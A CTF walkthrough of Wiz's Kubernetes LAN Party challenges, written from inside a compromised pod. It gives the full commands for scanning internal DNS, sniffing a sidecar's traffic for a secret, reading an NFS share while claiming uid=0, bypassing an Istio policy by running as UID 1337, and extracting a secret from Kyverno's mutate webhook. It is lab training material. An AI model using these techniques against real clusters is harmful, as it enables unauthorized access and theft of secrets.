Warning: Spoilers!
This walkthrough goes over the 5 Kubernetes LAN Party challenges created by wiz.io.
This CTF focuses more on Kubernetes tooling implementations and Linux.
All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}
Recon
You have shell access to a compromised Kubernetes pod at the bottom of this page, and your next objective is to further compromise other internal services. As a warmup, use DNS scanning to uncover hidden internal services and obtain the flag. We have loaded your machine with dnscan to ease this process for further challenges.
Looking around, we find ourselves in a pod (all the challenges usually start that way). Changing to the /var/run/secrets/kubernetes.io/serviceaccount directory, we can find the namespace we're running in:
cd /var/run/secrets/kubernetes.io/serviceaccount
cat namespace
# k8s-lan-party
Let's look at the usage of dnscan:
dnscan --help
# Usage of dnscan:
# -subnet string
# Input to scan, CIDR notation (e.g., 10.5.0.0/24) or wildcard (e.g., 10.5.0.*)
env | grep HOST
# KUBERNETES_SERVICE_HOST=10.100.0.1
dnscan -subnet 10.100.0.0/16
# 10.100.241.254 -> flag.svc.cluster.local.
# 65536 / 65536 [-------------------------------------------------------------------------------] 100.00% 988 p/s
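The /16 scan range comes straight from the API server's cluster IP in KUBERNETES_SERVICE_HOST. A minimal sketch of deriving it (the value is hardcoded here since this runs outside the pod, and the /16 service CIDR is an assumption):

```shell
# Hardcoded for illustration; inside the pod this is already set in the env
KUBERNETES_SERVICE_HOST=10.100.0.1

# Keep the first two octets and assume a /16 service CIDR
SUBNET="$(echo "$KUBERNETES_SERVICE_HOST" | cut -d. -f1-2).0.0/16"
echo "$SUBNET"   # 10.100.0.0/16

# Inside the pod you would then run: dnscan -subnet "$SUBNET"
```

If the cluster uses a narrower service CIDR, the same trick works with a longer prefix.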
I wonder what this is 👀
curl 10.100.241.254
# wiz_k8s_lan_party{FLAG_GOES_HERE}
Finding Neighbours
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
Running tcpdump, we can see the traffic the sidecar is making:
tcpdump
After waiting a little, we get the following logs:
16:25:45.433018 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [S], seq 3171463156, win 64240, options [mss 1460,sackOK,TS val 3407852821 ecr 0,nop,wscale 7], length 0
16:25:45.433189 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [S.], seq 1180313456, ack 3171463157, win 65160, options [mss 1460,sackOK,TS val 2963764429 ecr 3407852821,nop,wscale 7], length 0
16:25:45.433198 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3407852821 ecr 2963764429], length 0
16:25:45.433237 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [P.], seq 1:215, ack 1, win 502, options [nop,nop,TS val 3407852821 ecr 2963764429], length 214: HTTP: POST / HTTP/1.1
16:25:45.433346 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [.], ack 215, win 508, options [nop,nop,TS val 2963764429 ecr 3407852821], length 0
16:25:45.435597 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [P.], seq 1:206, ack 215, win 508, options [nop,nop,TS val 2963764431 ecr 3407852821], length 205: HTTP: HTTP/1.1 200 OK
16:25:45.435604 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 206, win 501, options [nop,nop,TS val 3407852824 ecr 2963764431], length 0
16:25:45.435705 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [F.], seq 215, ack 206, win 501, options [nop,nop,TS val 3407852824 ecr 2963764431], length 0
16:25:45.435844 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [F.], seq 206, ack 216, win 508, options [nop,nop,TS val 2963764432 ecr 3407852824], length 0
16:25:45.435849 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 207, win 501, options [nop,nop,TS val 3407852824 ecr 2963764432], length 0
Let's poke around and see if we can get any other info out of it:
dig +short reporting-service.k8s-lan-party.svc.cluster.local A
# 10.100.171.123
nmap -T4 10.100.171.123
# ...
# Lots and lots of ports
Eventually I got stuck, so I looked up whether I could get full packets out of tcpdump…
tcpdump -i any -s 0 'tcp port http' -A
# 16:32:31.470137 ns-12b555 Out IP 192.168.7.169.43222 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [P.], seq 1:215, ack 1, win 502, options [nop,nop,TS val 3408258858 ecr 2964170466], length 214: HTTP: POST / HTTP/1.1
# E..
# ..@.........
# d.{...P.z...U.x.....-.....
# .%.*....POST / HTTP/1.1
# Host: reporting-service
# User-Agent: curl/7.64.0
# Accept: */*
# Content-Length: 63
# Content-Type: application/x-www-form-urlencoded
# wiz_k8s_lan_party{FLAG_GOES_HERE}
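Rather than eyeballing the ASCII dump, the flag can be grepped out by its known format. A sketch, with the relevant part of the dump saved to a hypothetical dump.txt (in the pod you would pipe tcpdump straight into grep):

```shell
# Stand-in for the captured POST body (dump.txt is hypothetical)
cat > dump.txt <<'EOF'
POST / HTTP/1.1
Host: reporting-service
wiz_k8s_lan_party{FLAG_GOES_HERE}
EOF

# All flags follow the wiz_k8s_lan_party{*} format, so match on that
grep -o 'wiz_k8s_lan_party{[^}]*}' dump.txt   # wiz_k8s_lan_party{FLAG_GOES_HERE}
```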
Data Leakage
The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦️.
Doing some quick enumeration
env
# ...
df -h
# Filesystem Size Used Avail Use% Mounted on
# overlay 300G 23G 278G 8% /
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ 8.0E 0 8.0E 0% /efs
# tmpfs 60G 12K 60G 1% /var/run/secrets/kubernetes.io/serviceaccount
# tmpfs 64M 0 64M 0% /dev/null
Hmmm efs?
ls -l / | grep efs
# drwxr-xr-x 2 root root 6144 Mar 11 11:43 efs
ls -l /efs
# ---------- 1 daemon daemon 73 Mar 11 13:52 flag.txt
cat /efs/flag.txt
# cat: /efs/flag.txt: Permission denied
dig fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com +short
# 192.168.124.98
Our user does not have permissions to mount volumes. :(
Some notes: none of the techniques from these worked:
https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-efs-enum
mount | grep efs
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.4.189,local_lock=none,addr=192.168.124.98)
nfs-ls nfs://192.168.124.98/
# Times out
Asking for a hint points us at two commands, nfs-ls and nfs-cat. I was still stuck after that, so I found a writeup on libnfs, the project that provides both tools:
https://github.com/sahlberg/libnfs
What I learned from that writeup is that a version number must be specified in the command. The version can be sourced from the mount command we ran earlier (vers=4.1).
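Pulling the version out of the mount options can be scripted; a small sketch with the mount line hardcoded (abbreviated) from the earlier output:

```shell
# Mount line copied (abbreviated) from the earlier `mount | grep efs` output
MOUNT_LINE='fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576)'

# Extract the value of the vers= option
VERS=$(echo "$MOUNT_LINE" | grep -o 'vers=[0-9.]*' | cut -d= -f2)
echo "$VERS"   # 4.1
```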
nfs-ls nfs://192.168.124.98/?version=4.1
# ---------- 1 1 1 73 flag.txt
Now that we can finally list files, let's try getting the contents of the flag:
# Version and uid must be specified
nfs-cat "nfs://192.168.124.98//flag.txt?version=4&uid=0"
# wiz_k8s_lan_party{FLAG_GOES_HERE}
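Why asserting uid=0 works at all: the share is mounted with sec=sys (AUTH_SYS), under which the server simply trusts whatever uid/gid the client claims. Building the nfs-cat URL from the pieces we already have can be sketched as:

```shell
# Server IP from the dig output earlier
SERVER=192.168.124.98

# sec=sys means the server accepts whatever uid we assert, hence uid=0
URL="nfs://$SERVER//flag.txt?version=4&uid=0"
echo "$URL"   # nfs://192.168.124.98//flag.txt?version=4&uid=0
```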
Bypassing Boundaries
Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]
Let's poke around to see what exists on this pod:
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# ...
# istio:x:1337:1337::/home/istio:/bin/sh
# player:x:1001:1001::/home/player:/bin/sh
The only interesting entries are the istio and player users. Poking around the pod, I could not find much; we don't have many permissions. Since this is a network-related challenge, let's run dnscan again:
# env shows IPs used by the cluster
dnscan -subnet 10.100.0.1/16
# 10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
Let's try making GET/POST requests to the endpoint; they will probably fail, though:
curl -X GET 10.100.224.159
# RBAC: access denied
The following GitHub issue explains why the istio user can bypass the policy: https://github.com/istio/istio/issues/4286
TL;DR: Istio's iptables rules exempt traffic from the sidecar proxy's own UID (1337, the istio user) from redirection, so any process running as that UID bypasses the mesh entirely.
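Istio's init container sets this exemption up with an iptables owner-match rule, roughly `iptables -t nat -A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN` (shown for illustration, not run here). The magic UID can be confirmed from /etc/passwd; a sketch against a hypothetical passwd.sample copied from the output above:

```shell
# Sample of the pod's /etc/passwd (passwd.sample is hypothetical)
cat > passwd.sample <<'EOF'
root:x:0:0:root:/root:/bin/bash
istio:x:1337:1337::/home/istio:/bin/sh
player:x:1001:1001::/home/player:/bin/sh
EOF

# Field 3 is the numeric UID; 1337 is the UID Istio exempts from redirection
awk -F: '$1 == "istio" { print $3 }' passwd.sample   # 1337
```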
su istio
curl -X GET 10.100.224.159
# wiz_k8s_lan_party{FLAG_GOES_HERE}
Found a writeup that can explain it better than I can.
Lateral Movement
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: apply-flag-to-env
  namespace: sensitive-ns
spec:
  rules:
  - name: inject-env-vars
    match:
      resources:
        kinds:
        - Pod
    mutate:
      patchStrategicMerge:
        spec:
          containers:
          - name: "*"
            env:
            - name: FLAG
              value: "{flag}"
Let's start off with a network scan:
dnscan --subnet 10.100.0.0/16
# 10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
# 10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
# 10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
# 10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
# 10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
# 10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.
Knowing how admission controllers generally work is helpful here: when a request reaches the Kubernetes API server, it is forwarded to any matching validating/mutating webhooks, and the webhook service itself typically accepts these requests without authentication. In our case the webhook is Kyverno (kyverno-svc.kyverno.svc.cluster.local); if a pod matches the policy apply-flag-to-env, Kyverno will mutate it.
Let's create a sample AdmissionReview object using kube-review, based on a sample pod:
kubectl run foo --namespace sensitive-ns --image nginx -o yaml --dry-run=client | ./kube-review-darwin-arm64 create > pod.json
I put the JSON up on Pastebin since I can't paste into the web shell.
Now we can hit the endpoint with the pod spec and have Kyverno mutate it, adding the flag environment variable:
curl -X POST -H "Content-Type: application/json" --data @pod.json https://kyverno-svc.kyverno.svc.cluster.local/mutate -k | jq .
# ...
# In the response is the flag
curl -X POST -H "Content-Type: application/json" --data @pod.json https://kyverno-svc.kyverno.svc.cluster.local/mutate -k | jq -r .response.patch | base64 -d | jq -r '.[0].value[0].value'
# wiz_k8s_lan_party{FLAG_GOES_HERE}
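The jq pipeline works because Kyverno returns its mutation as a base64-encoded JSON Patch in .response.patch. A self-contained sketch of the decode step, using a fabricated patch in place of the real response:

```shell
# Fabricated stand-in for .response.patch from the AdmissionReview response
PATCH_B64=$(printf '[{"op":"add","path":"/spec/containers/0/env","value":[{"name":"FLAG","value":"wiz_k8s_lan_party{FLAG_GOES_HERE}"}]}]' | base64 | tr -d '\n')

# Decode the patch and pull the flag out by its known format
echo "$PATCH_B64" | base64 -d | grep -o 'wiz_k8s_lan_party{[^}]*}'
```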